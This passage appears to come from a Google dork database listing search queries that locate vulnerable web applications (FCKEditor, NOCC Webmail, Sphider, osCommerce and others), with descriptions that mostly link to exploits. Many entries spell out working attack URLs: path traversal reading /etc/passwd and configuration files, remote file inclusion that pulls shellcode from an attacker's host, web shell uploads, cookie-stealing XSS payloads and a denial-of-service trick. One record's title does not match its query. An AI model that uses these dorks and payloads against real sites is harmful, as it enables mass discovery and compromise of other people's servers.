[[descr]Fingerprint.jsp is an Axis sample file that often contains a wealth of information about the types of middleware components driving web services. This script has a propensity to give back massive amounts of diagnostic and configuration information when present.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Afingerprint.jsp+-CVS+-Mailing+intext%3AServlet%2BEngine&btnG=Search[url]]
[[dork]inurl:fingerprint.jsp -CVS -Mailing intext:Servlet+Engine[dork]]
[end][1691]]
[[start][1692]
[[title]inurl:happyaxis.jsp -CVS -Mailing[[title]]
[[descr]Happyaxis.jsp is an Axis server configuration file that seems to double check the application server to see if its web services capable with all the right components installed. This file tends to give back a wealth of information that a site really shouldn't really share with the world.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&q=inurl%3Ahappyaxis.jsp+-CVS+-Mailing&btnG=Search[url]]
[[dork]inurl:happyaxis.jsp -CVS -Mailing[dork]]
[end][1692]]
[[start][1693]
[[title]"index of" intext:fckeditor inurl:fckeditor[[title]]
[[descr]"index of" intext:fckeditor inurl:fckeditor <br>
<br>
this dork is for FCKEditor script<br>
<br>
through <br>
editor/filemanager/browser/default/connectors/connector.php script a user can upload malicious contempt on target machine including php code and launch commands... <br>
<br>
however if you do not succeed to execute the shell, FCKEditor is integrated in a lot of applications, you can check for a local inclusion issue inside of them... <br>
<br>
this tool make the dirty work for 2.0 - 2.2 versions: <br>
<br>
http://retrogod.altervista.org/fckeditor_22_xpl.html[descr]]
[[url]http://www.google.com/search?hl=it&q=%22index+of%22+intext%3Afckeditor+inurl%3Afckeditor+&btnG=Cerca+con+Google&meta=[url]]
[[dork]"index of" intext:fckeditor inurl:fckeditor [dork]]
[end][1693]]
[[start][1694]
[[title]"powered by runcms" -runcms.com -runcms.org[[title]]
[[descr]"powered by runcms" -runcms.com -runcms.org <br>
<br>
all versions <=1.2 are vulnerable to an arbitrary remote inclusion, <br>
this is more specific for the versions I tested: <br>
<br>
"powered by runcms (1.1)|(1.2)" -runcms.com -runcms.org <br>
<br>
however all versions <= 1.3a, trough FCKEditor, let a user to upload <br>
a .php5, .php3 or .inc file <br>
<br>
see the exploits: <br>
<br>
http://retrogod.altervista.org/runcms_13a_xpl.html <br>
http://retrogod.altervista.org/fckeditor_22_xpl.html[descr]]
[[url]http://www.google.com/search?hl=it&q=%22powered+by+runcms%22+-runcms.com+-runcms.org+&btnG=Cerca&lr=[url]]
[[dork]"powered by runcms" -runcms.com -runcms.org [dork]]
[end][1694]]
[[start][1695]
[[title]("This Dragonfly™ installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com[[title]]
[[descr]exploit and short explaination: <br>
<br>
http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html[descr]]
[[url]http://www.google.com/search?q=(%22This+Dragonfly%E2%84%A2+installation+was%22+%7C+%22Thanks+for+downloading+Dragonfly%22)+-inurl:demo+-inurl:cpgnuke.com&hl=en&lr=&start=20&sa=N[url]]
[[dork]("This Dragonflyâ„¢ installation was" | "Thanks for downloading Dragonfly") -inurl:demo -inurl:cpgnuke.com[dork]]
[end][1695]]
[[start][1696]
[[title]inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su nombre de usuario" -ext:pdf -inurl:"download.php[[title]]
[[descr]exploit and short explaination: <br>
http://retrogod.altervista.org/docmgr_0542_incl_xpl.html[descr]]
[[url]http://www.google.com/search?q=inurl:docmgr+%7C+intitle:%22DocMGR%22+%22enter+your+Username+and%22%7C%22und+Passwort+bitte%22%7C%22saisir+votre+nom%22%7C%22su+nombre+de+usuario%22+-ext:pdf+-inurl:%22download.php%22+&hl=en&lr=&filter=0[url]]
[[dork]inurl:docmgr | intitle:"DocMGR" "enter your Username and"|"und Passwort bitte"|"saisir votre nom"|"su nombre de usuario" -ext:pdf -inurl:"download.php" [dork]]
[end][1696]]
[[start][1697]
[[title](intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc[[title]]
[[descr]exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: <br>
<br>
(intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc <br>
<br>
It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 <br>
<br>
by now switch to sql/ directory and search the install-0.9.7.php script <br>
<br>
explaination link: <br>
http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.html<br>
exploit adjusted for flyspray: <br>
<br>
http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%28intitle%3A%22Flyspray+setup%22%7C%22powered+by+flyspray+0.9.7%22%29+-flyspray.rocks.cc+&btnG=Cerca+con+Google&meta=[url]]
[[dork](intitle:"Flyspray setup"|"powered by flyspray 0.9.7") -flyspray.rocks.cc [dork]]
[end][1697]]
[[start][1698]
[[title]intext:"LinPHA Version" intext:"Have fun"[title]]
[[descr]this is for Linpha <=1.0 arbitrary local inclusion:<br>
<br>
http://retrogod.altervista.org/linpha_10_local.html <br>
<br>
intext:"LinPHA Version" intext:"Have fun" <br>
<br>
to see version in description <br>
<br>
in Linpha 0.9 branch there is sql injection through cookies also to bypass admin login, search for exploit[descr]]
[[url]http://www.google.com/search?q=intext:%22LinPHA+Version%22+intext:%22Have+fun%22+&hl=en&lr=&start=20&sa=N[url]]
[[dork]intext:"LinPHA Version" intext:"Have fun" [dork]]
[end][1698]]
[[start][1699]
[[title]inurl:updown.php | intext:"Powered by PHP Uploader Downloader"[title]]
[[descr]this (evil ) script lets you to upload a php shell on target server, in most cases not password protected <br>
<br>
dork: <br>
<br>
inurl:updown.php | intext:"Powered by PHP Uploader Downloader" <br>
<br>
a note: sometimes you don't see a link to a list of uploaded files... just switch to <br>
<br>
http://[target]/[path]/updown.php?action=download[descr]]
[[url]http://www.google.com/search?hl=it&q=inurl%3Aupdown.php+%7C+intext%3A%22Powered+by+PHP+Uploader+Downloader%22+&btnG=Cerca+con+Google&meta=&num=100[url]]
[[dork]inurl:updown.php | intext:"Powered by PHP Uploader Downloader" [dork]]
[end][1699]]
[[start][1700]
[[title]("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis[[title]]
[[descr]dork: ("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis <br>
<br>
software: http://nocc.sourceforge.net/ <br>
<br>
this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss & possible remote code execution <br>
flaws I found: <br>
<br>
example of arbitrary local inclusion: <br>
http://[target]/[path]/html/footer.php?cmd=dir&_SESSION[nocc_theme]=../../../../../../../../../test.php%00 <br>
http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 <br>
http://[target]/[path]/index.php?lang=fr&theme=../../../../../../../../../../../../etc/passwd%00 <br>
http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test <br>
<br>
example of commands execution (including an uploaded mail attachment with php code inside, <br>
filename is predictable...) <br>
http://[target]/[path]/index.php?cmd=dir&lang=../tmp/php331.tmp1140514888.att%00 <br>
<br>
xss: <br>
http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) <br>
http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) <br>
http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) <br>
http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) <br>
http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) <br>
http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) <br>
http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=">alert(document.cookie) <br>
<br>
<br>
full advisory & poc exploit: <br>
<br>
http://retrogod.altervista.org/noccw_10_incl_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=%28%22powered+by+nocc%22+intitle%3A%22NOCC+Webmail%22%29+-site%3Asourceforge.net+-Zoekinalles.nl+-analysis+&meta=&num=100&filter=0[url]]
[[dork]("powered by nocc" intitle:"NOCC Webmail") -site:sourceforge.net -Zoekinalles.nl -analysis [dork]]
[end][1700]]
[[start][1701]
[[title]intitle:"igenus webmail login"[title]]
[[descr]intitle:"igenus webmail login"<br>
<br>
example exploit: <br>
<br>
http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 <br>
http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 <br>
<br>
also, on php5: <br>
http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:password@somehost.com&cmd=dir <br>
<br>
where on somehost.com you have a php shell code in a ".config" file <br>
<br>
exploit code: <br>
http://retrogod.altervista.org/igenus_202_xpl_pl.html<br>
[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3A%22igenus+webmail+login%22&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]intitle:"igenus webmail login"[dork]]
[end][1701]]
[[start][1702]
[[title]allintitle:"FirstClass Login"[title]]
[[descr]allintitle:"FirstClass Login" <br>
<br>
this is for firstclass directory listings<br>
<br>
go to http://[target]/[path]/Search <br>
<br>
<br>
type just ' in search field and you have a list of downloadable files, you don't see all files on server but you can search for a robots.txt with some folders path or other info for site scructure, crawling in this way you have unauthorized access on all files on the target server[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=allintitle%3A%22FirstClass+Login%22+&filter=0[url]]
[[dork]allintitle:"FirstClass Login" [dork]]
[end][1702]]
[[start][1703]
[[title]"powered by 4images"[title]]
[[descr]this is for 4images <= 1.7.1 remote code execution<br>
(you can see version in google description)<br>
<br>
poc exploit: <br>
<br>
http://retrogod.altervista.org/4images_171_incl_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22powered+by+4images%22+&num=100&hl=en&lr=&start=100&sa=N&filter=0[url]]
[[dork]"powered by 4images" [dork]]
[end][1703]]
[[start][1704]
[[title]intext:"Powered By Geeklog" -geeklog.net[[title]]
[[descr]dork: intext:"Powered By Geeklog" -geeklog.net <br>
<br>
this is for the vulnerability discovered by GulfTech research, related stuff: <br>
<br>
(*) http://www.gulftech.org/?node=research&article_id=00102-02192006 <br>
http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&type=archives&%5Bsearch%5D.x=0&%5Bsearch%5D.y=0 <br>
<br>
<br>
exploit for (*) : <br>
http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) <br>
http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)[descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%22Powered+By+Geeklog%22+-geeklog.net+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]intext:"Powered By Geeklog" -geeklog.net [dork]]
[end][1704]]
[[start][1705]
[[title]intitle:admbook intitle:version filetype:php[[title]]
[[descr]intitle:admbook intitle:version filetype:php <br>
<br>
tested version: 1.2.2, you can inject php code in config-data.php and execute commands on target through X-FOWARDED FOR http header when you post a message <br>
<br>
also you can see phpinfo(): <br>
<br>
http://[target]/[path]/admin/info.php<br>
<br>
perl exploit:<br>
http://retrogod.altervista.org/admbook_122_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=intitle%3Aadmbook+intitle%3Aversion+filetype%3Aphp+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]intitle:admbook intitle:version filetype:php [dork]]
[end][1705]]
[[start][1706]
[[title]WEBalbum 2004-2006 duda -ihackstuff -exploit[[title]]
[[descr]dork: <br>
WEBalbum 2004-2006 duda -ihackstuff -exploit<br>
<br>
software site: http://www.web-album.org/ <br>
<br>
advisory/ poc exploit: <br>
http://retrogod.altervista.org/webalbum_202pl_local_xpl.html[descr]]
[[url]http://www.google.com/search?q=WEBalbum+2004-2006+duda+-ihackstuff+-exploit&num=100&hl=en&lr=&start=200&sa=N&filter=0[url]]
[[dork]WEBalbum 2004-2006 duda -ihackstuff -exploit[dork]]
[end][1706]]
[[start][1707]
[[title]intext:"Powered by Plogger!" -plogger.org -ihackstuff -exploit[[title]]
[[descr]explaination & exploit: <br>
http://retrogod.altervista.org/plogger_b21_sql_xpl.html[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1707]]
[[start][1708]
[[title]intext:"powered by gcards" -ihackstuff -exploit[[title]]
[[descr]this is for gcards <=1.45 multiple vulnerabilities, advisory & poc exploit: <br>
<br>
http://retrogod.altervista.org/gcards_145_xpl.html[descr]]
[[url]http://www.google.com/search?num=100&hl=it&q=intext%3A%22powered+by+gcards%22+-ihackstuff+-exploit&btnG=Cerca&lr=&filter=0[url]]
[[dork]intext:"powered by gcards" -ihackstuff -exploit[dork]]
[end][1708]]
[[start][1709]
[[title]"powered by php icalendar" -ihackstuff -exploit[[title]]
[[descr]this is for <br>
php iCalendar <= 2.21 "cookie_language"/"cookie_style" remote cmmdns xctn <br>
& <br>
php iCalendar <= 2.21 publish.ical.php remote cmmdns xctn <br>
<br>
exploits: <br>
http://retrogod.altervista.org/phpical_221_incl_xpl.html <br>
http://retrogod.altervista.org/phpical_221_put_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22powered+by+php+icalendar%22+-ihackstuff+-exploit&num=100&hl=en&lr=&start=100&sa=N&filter=0[url]]
[[dork]"powered by php icalendar" -ihackstuff -exploit[dork]]
[end][1709]]
[[start][1710]
[[title]"powered by guestbook script" -ihackstuff -exploit[[title]]
[[descr]poc exploit & explaination: <br>
http://retrogod.altervista.org/gbs_17_xpl_pl.html[descr]]
[[url]http://www.google.com/search?num=100&hl=it&q=%22powered+by+guestbook+script%22+-ihackstuff+-exploit&lr=&filter=0[url]]
[[dork]"powered by guestbook script" -ihackstuff -exploit[dork]]
[end][1710]]
[[start][1711]
[[title]"Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro[[title]]
[[descr]tested version: 0.5 <br>
without to have admin rights, you can go to: <br>
http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php <br>
or <br>
http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php <br>
to upload a shell with the usual code inside... <br>
after: <br>
http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la <br>
<br>
tool: <br>
http://retrogod.altervista.org/XHP_CMS_05_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22Powered+by+XHP+CMS%22+-ihackstuff+-exploit+-xhp.targetit.ro&num=100&hl=en&lr=&start=200&sa=N&filter=0[url]]
[[dork]"Powered by XHP CMS" -ihackstuff -exploit -xhp.targetit.ro[dork]]
[end][1711]]
[[start][1712]
[[title]inurl:"wrapper/index.php?file_wrap"[title]]
[[descr]inurl:"wrapper/index.php?file_wrap" <br>
<br>
it reveals all files on target system but only on win boxes,ex: <br>
<br>
http://[target]/[path]/wrapper/index.php?file_wrap=..\..\..\..\..\..\..\..\..\..\..\boot.ini <br>
<br>
<br>
you cannot use "/" because is filtered, code is like this: <br>
<br>
[code]<br>
if(strstr($file_wrap, "/") <br>
|| !(file_exists("pages/$file_wrap")) <br>
|| strstr($file_wrap, "%00")) <br>
{ echo "Désolé, page invalide !";} <br>
else <br>
{ require_once("../wrapper/pages/$file_wrap"); } <br>
[/code] <br>
<br>
just<br>
http://[target]/[path]/wrapper/index.php?file_wrap=<br>
<br>
to list some files.<br>
<br>
tool to check this issue: <br>
<br>
http://retrogod.altervista.org/arti_303_xpl.html <br>
<br>
<br>
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=inurl%3A%22wrapper%2Findex.php%3Ffile_wrap%22+[url]]
[[dork]inurl:"wrapper/index.php?file_wrap" [dork]]
[end][1712]]
[[start][1713]
[[title]inurl:*.exe ext:exe inurl:/*cgi*/[[title]]
[[descr]a cgi-bin executables xss/html injection miscellanea:<br>
<br>
some examples:<br>
<br>
inurl:keycgi.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/keycgi.exe?cmd=download&product=">[XSS HERE] <br>
<br>
inurl:wa.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/wa.exe?SUBED1=">[XSS HERE] <br>
<br>
inurl:mqinterconnect.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/mqinterconnect.exe?poi1iconid=11111&poi1streetaddress=">[XSS HERE]&poi1city=city&poi1state=OK <br>
<br>
inurl:as_web.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/as_web.exe?[XSS HERE]+B+wishes <br>
<br>
inurl:webplus.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/webplus.exe?script=">[XSS HERE] <br>
<br>
inurl:odb-get.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/odb-get.exe?WIT_template=">[XSS HERE]&WIT_oid=what::what::1111&m=1&d= <br>
<br>
inurl:hcapstat.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/hcapstat.exe?CID=">[XSS HERE]&GID=&START=110&SBN=OFF&ACTION=Submit <br>
<br>
inurl:webstat.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/webstat.exe?A=X&RE=">[XSS HERE] <br>
<br>
inurl:cows.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/cows/cows.exe?cgi_action=tblBody&sort_by=">[XSS HERE] <br>
<br>
inurl:findifile.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/findfile.exe?SEEKER=">[XSS HERE]&LIMIT=50&YEAR="> <br>
<br>
inurl:baserun.exe ext:exe inurl:/*cgi*/ <br>
xss: <br>
http://[target]/[path]/cgi-bin/baserun.exe?_cfg=">[XSS HERE] <br>
<br>
inurl:Users.exe ext:exe inurl:/*cgi*/ <br>
html injection: <br>
http://[target]/[path]/cgi-bin/Users.exe?SITEID=[html]<!--&ACTION=Profile&USERID=uid <br>
<br>
inurl:w.exe ext:exe inurl:/*cgi*/ <br>
this script works like google translate page, can be used like a proxy, you do not see <br>
images... but it seems you cannot use url params, example: <br>
http://[target]/[path]/w.exe?y=http://johnny.ihackstuff.com <br>
<br>
<br>
inurl:isis.exe ext:exe inurl:/*cgi*/ <br>
(a login page) <br>
<br>
<br>
inurl:shopclerk.exe ext:exe inurl:/*cgi*/ <br>
xss:<br>
http://[target]/[path]/cgi-bin/shopclerk.exe?Session=02453277000023&page=">[XSS HERE]<br>
<br>
inurl:fccgi.exe ext:exe inurl:/*cgi*/ <br>
html injection:<br>
http://[target]/[path]/cgi-bin/fccgi.exe?w3Exec=[html%20here]<!--&CMD=DETAIL&SUB=w3VM<br>
<br>
inurl:pboard.exe ext:exe inurl:/*cgi*/<br>
http://[target]/[path]/cgi/pboard.exe?idno=">[XSS HERE]&page=1<br>
<br>
inurl:webstat.exe ext:exe inurl:/*cgi*/<br>
http://[target]/[path]/webstat.exe?A=X&RA=[XSS HERE]<br>
[descr]]
[[url]http://www.google.com/search?hl=it&q=inurl%3A*.exe+ext%3Aexe+inurl%3A%2F*cgi*%2F&meta=&num=100&filter=0[url]]
[[dork]inurl:*.exe ext:exe inurl:/*cgi*/[dork]]
[end][1713]]
[[start][1714]
[[title]"powered by claroline" -demo[[title]]
[[descr]this is for Claroline e-learning platform <= 1.7.4 multiple vulnerabilities<br>
<br>
advisory & poc exploit:<br>
http://retrogod.altervista.org/claroline_174_incl_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22powered+by+claroline%22+-demo&num=100&hl=en&lr=&start=100&sa=N&filter=0[url]]
[[dork]"powered by claroline" -demo[dork]]
[end][1714]]
[[start][1715]
[[title]"PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)[[title]]
[[descr]this is for PhpCollab 2.x / NetOffice 2.x sql injection<br>
<br>
http://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html[descr]]
[[url]http://www.google.com/search?q=%22PhpCollab+.+Log+In%22+%7C+%22NetOffice+.+Log+In%22+%7C+(intitle:%22index.of.%22+intitle:phpcollab%7Cnetoffice+inurl:phpcollab%7Cnetoffice+-gentoo)+&num=100&hl=en&lr=&start=&sa=N&filter=0[url]]
[[dork]"PhpCollab . Log In" | "NetOffice . Log In" | (intitle:"index.of." intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo) [dork]]
[end][1715]]
[[start][1718]
[[title]"2004-2005 ReloadCMS Team."[title]]
[[descr]this is for ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution vulnerability, poc exploit:<br>
<br>
http://retrogod.altervista.org/reloadcms_125_xpl.html[descr]]
[[url]http://www.google.com/search?hl=en&q=intext%3A%222000-2001+The+phpHeaven+Team%22+-sourceforge+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]intext:"2000-2001 The phpHeaven Team" -sourceforge [dork]]
[end][1718]]
[[start][1719]
[[title]inurl:/counter/index.php intitle:"+PHPCounter 7.*"[title]]
[[descr]This is an online vulnerable web stat program called PHPCounter 7.<br>
<br>
http://www.clydebelt.org.uk/counter/help.html <br>
<br>
It has several public vulnerabilities in versions 7.1 and 7.2 that include cross site scripting and unauthorized information disclosure.[descr]]
[[url]http://www.google.com/[url]]
[[dork][dork]]
[end][1719]]
[[start][1720]
[[title]intext:"2000-2001 The phpHeaven Team" -sourceforge[[title]]
[[descr]intext:"2000-2001 The phpHeaven Team" -sourceforge <br>
<br>
this is for PHPMyChat remote commands execution,<br>
advisory/poc exploits:<br>
<br>
http://retrogod.altervista.org/phpmychat_0145_xpl.html<br>
http://retrogod.altervista.org/phpmychat_015dev_xpl.html[descr]]
[[url]http://www.google.com/search?q=intext:%222000-2001+The+phpHeaven+Team%22+-sourceforge&num=100&hl=en&lr=&start=0&sa=N&filter=0[url]]
[[dork]intext:"2000-2001 The phpHeaven Team" -sourceforge[dork]]
[end][1720]]
[[start][1721]
[[title]inurl:server.php ext:php intext:"No SQL" -Released[[title]]
[[descr]vulnerability<br>
discovered by Secunia, quick reference:<br>
<br>
http://www.securityfocus.com/bid/16187<br>
<br>
an example of exploit for PHPOpenChat:<br>
<br>
http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.html<br>
<br>
a DOS exploit:<br>
<br>
http://retrogod.altervista.org/adodb_dos.html<br>
<br>
<br>
<br>
<br>
[descr]]
[[url]http://www.google.com/search?q=inurl:server.php+ext:php++intext:%22No+SQL%22+-Released&num=100&hl=en&lr=&start=0&sa=N&filter=0[url]]
[[dork]inurl:server.php ext:php intext:"No SQL" -Released[dork]]
[end][1721]]
[[start][1722]
[[title]intitle:PHPOpenChat inurl:"index.php?language="[title]]
[[descr]exploit:<br>
<br>
http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.html<br>
<br>
also, information disclosure:<br>
<br>
http://[target]/[path]/include/adodb/tests/tmssql.php?do=phpinfo<br>
<br>
and denial of service on some windows system, multiple requests of:<br>
<br>
http://[target]/[path]/include/adodb/tests/tmssql.php?do=closelog<br>
[descr]]
[[url]http://www.google.com/search?q=intitle:PHPOpenChat+inurl:%22index.php%3Flanguage%3D%22+&num=100&hl=it&lr=&start=0&sa=N&filter=0[url]]
[[dork]intitle:PHPOpenChat inurl:"index.php?language=" [dork]]
[end][1722]]
[[start][1723]
[[title]"powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist -tincan.co.uk[[title]]
[[descr]this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:<br>
<br>
advisory/poc exploit: <br>
http://retrogod.altervista.org/phplist_2102_incl_xpl.html [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+phplist%22+%7C+inurl%3A%22lists%2F%3Fp%3Dsubscribe%22+%7C+inurl%3A%22lists%2Findex.php%3Fp%3Dsubscribe%22+-ubbi+-bugs+%2Bphplist+-tincan.co.uk[url]]
[[dork]"powered by phplist" | inurl:"lists/?p=subscribe" | inurl:"lists/index.php?p=subscribe" -ubbi -bugs +phplist -tincan.co.uk[dork]]
[end][1723]]
[[start][1726]
[[title]"powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee[[title]]
[[descr]dork: <br>
"powered by sphider" <br>
<br>
a vulnerable search engine script <br>
<br>
arbitrary remote inclusion, poc: <br>
<br>
http://[target]/[path]/admin/configset.php?cmd=ls%20-la&settings_dir=http://somehost.com <br>
<br>
where on somehost.com you have a shellcode in <br>
/conf.php/index.html <br>
<br>
references:<br>
http://retrogod.altervista.org/sphider_13_xpl_pl.html<br>
http://secunia.com/advisories/19642/ [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&q=%22powered+by+sphider%22+-exploit+-ihackstuff+-www.cs.ioc.ee[url]]
[[dork]"powered by sphider" -exploit -ihackstuff -www.cs.ioc.ee[dork]]
[end][1726]]
[[start][1727]
[[title]"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"[title]]
[[descr]dork: <br>
<br>
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" <br>
<br>
this is for PHP Web Statistik script, you can go to: <br>
<br>
http://[target]/[path_to]/log/logdb.dta to see clear text logs <br>
[descr]]
[[url]http://www.google.com/search?hl=en&q=%22by+Reimar+Hoven.+All+Rights+Reserved.+Disclaimer%22+%7C+inurl%3A%22log%2Flogdb.dta%22+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" [dork]]
[end][1727]]
[[start][1728]
[[title]inurl:"extras/update.php" intext:mysql.php -display[[title]]
[[descr]this is an osCommerce dork:<br>
<br>
inurl:"extras/update.php" intext:mysql.php -display <br>
<br>
or more simply: <br>
<br>
inurl:"extras/update.php" -display (this display some more hosts where error_reporting=0) <br>
<br>
I found this simple exploit, if extras/ folder is inside the www path, you can view all files on target system, including php files and so on, ex: <br>
<br>
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php <br>
<br>
http://[target]/[path]/extras/update.php?read_me=0&readme_file=../index.php <br>
<br>
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/fstab <br>
<br>
also, if you succeed to view configure script with database details, you can connect to it trough some <br>
test scripts inside this folder...<br>
<br>
now I read this:<br>
http://www.securityfocus.com/bid/14294/info<br>
<br>
this is actually unpatched/unresolved in 2.2 on Apr 2006[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3A%22extras%2Fupdate.php%22+intext%3Amysql.php+-display+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]inurl:"extras/update.php" intext:mysql.php -display [dork]]
[end][1728]]
[[start][1729]
[[title]inurl:sysinfo.cgi ext:cgi[[title]]
[[descr]dork:<br>
inurl:sysinfo.cgi ext:cgi <br>
<br>
exploit: <br>
http://www.milw0rm.com/exploits/1677 <br>
<br>
I found this command execution vulnerability in 1.2.1 <br>
but other versions maybe vulnerable too<br>
<br>
however, u can see version in google results[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Asysinfo.cgi+ext%3Acgi+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]inurl:sysinfo.cgi ext:cgi [dork]]
[end][1729]]
[[start][1731]
[[title]inurl:perldiver.cgi ext:cgi[[title]]
[[descr]dork: <br>
<br>
inurl:perldiver.cgi ext:cgi <br>
<br>
some interesting info about server and a cross site <br>
scripting vulnerability, poc: <br>
<br>
http://[target]/[path]/cgi-bin/perldiver.cgi?action=20&alert("lol")<br>
<br>
other reference:<br>
http://secunia.com/advisories/16888/[descr]]
[[url]http://www.google.com/search?hl=en&q=inurl%3Aperldiver.cgi+ext%3Acgi+&btnG=Cerca+con+Google&meta=&num=100&filter=0[url]]
[[dork]inurl:perldiver.cgi ext:cgi [dork]]
[end][1731]]
[[start][1732]
[[title]inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk[[title]]
[[descr]dork:<br>
<br>
inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk<br>
<br>
a remote user can execute an arbitrary function (without arguments) example: <br>
<br>
http://[target]/[path]/tmssql.php?do=phpinfo <br>
<br>
reference:<br>
http://www.osvdb.org/displayvuln.php?osvdb_id=22291 <br>
<br>
I also discovered that you can crash some win boxes / apache servers by sending<br>
multiple requests of <br>
<br>
http://[target]/[path]/tmssql.php?do=closelog<br>
<br>
see:<br>
<br>
http://www.milw0rm.com/exploits/1651[descr]]
[[url]http://www.google.com/search?q=inurl:tmssql.php+ext:php+mssql+pear+adodb++-cvs+-akbk&num=100&hl=en&lr=&start=0&sa=N&filter=0[url]]
[[dork]inurl:tmssql.php ext:php mssql pear adodb -cvs -akbk[dork]]
[end][1732]]
[[start][1733]
[[title]"powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje[[title]]
[[descr]dork: <br>
<br>
"powered by php photo album" | inurl:"main.php?cmd=album" -demo2 -pitanje <br>
<br>
<br>
poc: <br>
if register_globals = On & magic_quotes_gpc = Off <br>
<br>
http://[target]/[path]/language.php?data_dir=/etc/passwd%00 <br>
<br>
on, php5, if register_globals = on: <br>
<br>
http://[target]/[path]/language.php?cmd=ls%20-la&data_dir=ftp://Anonymous:fakemail.com@somehost.com/public/ <br>
<br>
where on ftp you have a translation.dat file with shellcode inside <br>
<br>
<br>
<br>
references:<br>
<br>
http://retrogod.altervista.org/phpalbum_0323_incl_xpl.html <br>
http://www.securityfocus.com/bid/17526 <br>
[descr]]
